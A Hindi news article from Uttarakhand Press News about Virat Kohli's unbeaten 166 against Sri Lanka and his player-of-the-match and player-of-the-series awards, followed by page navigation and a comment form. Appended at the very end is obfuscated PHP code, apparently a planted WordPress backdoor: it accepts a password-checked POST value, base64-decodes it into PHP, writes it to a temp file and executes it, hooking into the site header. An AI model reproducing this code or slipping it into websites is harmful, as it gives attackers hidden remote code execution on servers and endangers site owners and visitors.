Virat Kohli : ‘मैन ऑफ द मैच’ और ‘प्लेयर ऑफ द सीरीज’ का खिताब जीते, कही दिल को छूने वाली बात

Uttarakhand Press News, 16 January 2023: नई दिल्ली : भारत और श्रीलंका के बीच वनडे सीरीज का आखिरी मैच ग्रीनफील्ड इंटरनेशनल स्टेडियम में 15 जनवरी को खेला गया. टीम इंडिया ने तीन वनडे मैचों की सीरीज को 3-0 से जीत लिया और श्रीलंका को 317 रनों के बड़े अंतर से हरा दिया. इंडिया टीम के लिए ओपनर शुभमन गिल के अलावा विराट कोहली ने शानदार शतकीय पारी खेली. विराट कोहली ने 110 गेंदों पर नाबाद 166 रनों की पारी खेली. इसके लिए उन्हें मैन ऑफ द मैच और प्लेयर ऑफ द सीरीज विराट कोहली को चुना गया. इस पर विराट के फैंस ने सोशल मीडिया पर पोस्ट शेयर कर उन्हें जीत की बधाई दी है.

Virat Kohli Reaction : विराट कोहली सबसे ज्यादा प्लेयर ऑफ द सीरीज अवॉर्ड जीतने वाले खिलाड़ी बन गए हैं. इस खिताब को जीतने के बाद विराट ने अपने बयान में दिल को छू लेने वाली बात कह दी. विराट जब ट्रॉफी लेने के लिए पोडियम पर पहुंचे तो उनसे इसके बारे में पूछा गया तो उन्होंने इसका बड़ा ही रोचक जवाब दिया. उन्होंने कहा कि उन्हें याद नहीं है कि कितनी बार उन्हें मैन ऑफ द मैच अवॉर्ड चुना गया है. ‘मुझे इस बारे में कुछ नहीं पता है. उनके लिए यह महज माइंडसेट और टीम इंडिया के लिए खेलने का रिवार्ड है’. उनकी कोशिश हमेशा से ही टीम के लिए अच्छा परफॉर्म करने की रहती है. विराट ने कहा, ‘ मैं कोशिश करता हूं कि जितना लंबा हो सके, उतनी देर तक बल्लेबाजी कर सकूं. इसके अलावा विराट ने अपनी बल्लेबाजी को लेकर भी चर्चा की.

Virat kohli Century : विराट कोहली ने श्रीलंका के खिलाफ वनडे सीरीज के तीसरे मैच में धमाकेदार बल्लेबाजी से शानदार सेंचुरी लगाई. उन्होंने 110 गेंदों पर ताबड़तोड़ 166 रन बनाए और 317 रनों की वर्ल्ड रिकॉर्ड जीत हासिल की. विराट कोहली ने 38वीं बार मैन ऑफ द मैच अवॉर्ड अपने नाम किया है. उन्होंने अपने ब्रेक के बाद वापसी को लेकर भी चर्चा की. कोहली ने कहा कि जब वे लंबे ब्रेक से वापस आए हैं, उन्हें अच्छा लग रहा है. वे बस अपनी बल्लेबाजी का लुत्फ उठा रहा हैं. इतना ही नहीं विराट के कहा कि यही वह जगह है जहां वे आराम कर सकते हैं. ‘मैं अभी एक अच्छी जगह पर हूं और चाहता हूं कि यह जारी रहे’. विराट ने घरेलू मैदान पर 21वां शतक जमाया, जो वर्ल्ड रिकॉर्ड है. इससे पहले मास्टर ब्लास्टर सचिन तेंदुलकर के नाम सबसे अधिक 20 शतक दर्ज हैं.

Read Previous

Earthquake in Indonesia: इंडोनेशिया के सुमात्रा द्वीप में महसूस हुए भूकंप के तेज झटके, रिक्टर स्केल पर 6.2 रही तीव्रता

Read Next

Joshimath Sinking: देहरादून में निकाला जोशीमठ बचाओ पहाड़ बचाओ मार्च, राष्ट्रपति और पीएम को भेजेंगे पत्र

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}